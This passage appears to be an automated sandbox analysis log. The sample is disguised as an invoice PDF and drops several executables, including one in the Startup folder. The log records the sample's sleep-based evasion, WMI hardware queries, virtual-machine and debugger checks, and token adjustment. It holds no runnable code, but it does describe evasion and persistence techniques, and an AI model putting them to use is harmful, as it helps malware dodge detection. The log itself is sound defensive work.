                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeThread delayed: delay time: 300000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeThread delayed: delay time: 180000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1357
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1251
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeWindow / User API: threadDelayed 1099
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeWindow / User API: threadDelayed 8718
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeWindow / User API: threadDelayed 1499
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeWindow / User API: threadDelayed 8293
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4134
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2549
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeWindow / User API: threadDelayed 798
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeWindow / User API: threadDelayed 9012
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeWindow / User API: threadDelayed 2778
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeWindow / User API: threadDelayed 6864
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe TID: 5908Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5836Thread sleep count: 1357 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5888Thread sleep count: 1251 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6284Thread sleep time: -11990383647911201s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6216Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1516Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 6192Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 6644Thread sleep time: -120000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 6648Thread sleep time: -140000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 6668Thread sleep time: -300000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 7036Thread sleep time: -180000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 2148Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 2148Thread sleep time: -100000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 2148Thread sleep time: -100000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe TID: 7108Thread sleep time: -23058430092136925s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe TID: 7112Thread sleep count: 1099 > 30
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe TID: 7112Thread sleep count: 8718 > 30
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -24903104499507879s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -100000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -199750s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -99766s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -99656s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -99531s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -99422s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -99313s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -99156s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -99047s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -98938s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -98828s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -98719s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -98610s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -196906s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -98344s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -98234s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -196250s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -98016s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -195812s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -97797s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -97688s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -97563s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -97453s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -97344s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -97203s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -99765s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -99546s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -99437s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -99328s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -99218s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -99109s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -99000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -98890s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -98781s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -98671s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -98562s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -98343s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -98015s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -97796s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -97687s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -97578s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -97468s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -97359s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 2804Thread sleep time: -97250s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 6976Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 6976Thread sleep count: 109 > 30
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 6976Thread sleep time: -3270000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 6976Thread sleep time: -90000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 6232Thread sleep count: 224 > 30
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe TID: 6644Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5884Thread sleep count: 4134 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5884Thread sleep count: 2549 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6664Thread sleep count: 43 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6368Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6084Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 576Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 5168Thread sleep time: -120000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 5228Thread sleep time: -140000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 5268Thread sleep count: 60 > 30
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 5244Thread sleep time: -300000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 712Thread sleep time: -180000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 6812Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 6812Thread sleep time: -500000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 6812Thread sleep time: -100000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe TID: 4760Thread sleep time: -20291418481080494s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe TID: 4756Thread sleep count: 798 > 30
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe TID: 4756Thread sleep count: 9012 > 30
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -23980767295822402s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -100000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5248Thread sleep count: 2778 > 30
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -99703s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -199188s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -99453s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5248Thread sleep count: 6864 > 30
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -99313s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -99203s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -99047s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -98938s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -98797s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -98641s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -98531s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -98406s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -98297s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -196282s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -196000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -195782s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -97750s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -195282s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -97500s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -97391s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -97281s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -97172s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -97063s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -96953s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -96844s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -96735s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -96594s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -99844s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -99735s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -99344s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -99188s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -99078s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -98969s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -98860s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -98735s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -98547s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -98391s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -98250s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -97531s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -97422s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -97313s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -97203s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -97094s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -96985s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -99875s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -99750s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe TID: 5280Thread sleep time: -99625s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 5960Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 5960Thread sleep count: 112 > 30
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 5960Thread sleep time: -3360000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 5960Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 1352Thread sleep count: 340 > 30
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile Volume queried: C:\ FullSizeInformation
                            Source: powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpBinary or memory string: Hyper-V
                            Source: powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpBinary or memory string: Al:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                            Source: Matiexgoods.exe, 00000008.00000002.705756685.00000000044E1000.00000004.00000001.sdmpBinary or memory string: 1keA/sO5FDZFCBsE6iqEMuCQifoK6oH1s/UW1veY/gDcXrGORBZz4Z+noIDCwQ57PciD
                            Source: hawkgoods.exe, 00000006.00000002.397387574.00000000068E0000.00000002.00000001.sdmp, origigoods40.exe, 00000007.00000002.479272063.00000000060C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                            Source: hawkgoods.exe, 00000006.00000002.397387574.00000000068E0000.00000002.00000001.sdmp, origigoods40.exe, 00000007.00000002.479272063.00000000060C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                            Source: hawkgoods.exe, 00000006.00000002.397387574.00000000068E0000.00000002.00000001.sdmp, origigoods40.exe, 00000007.00000002.479272063.00000000060C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                            Source: Matiexgoods.exe, 00000008.00000002.694705884.0000000001823000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: hawkgoods.exe, 00000006.00000002.397387574.00000000068E0000.00000002.00000001.sdmp, origigoods40.exe, 00000007.00000002.479272063.00000000060C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_04B377F0 LdrInitializeThunk,
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess token adjusted: Debug
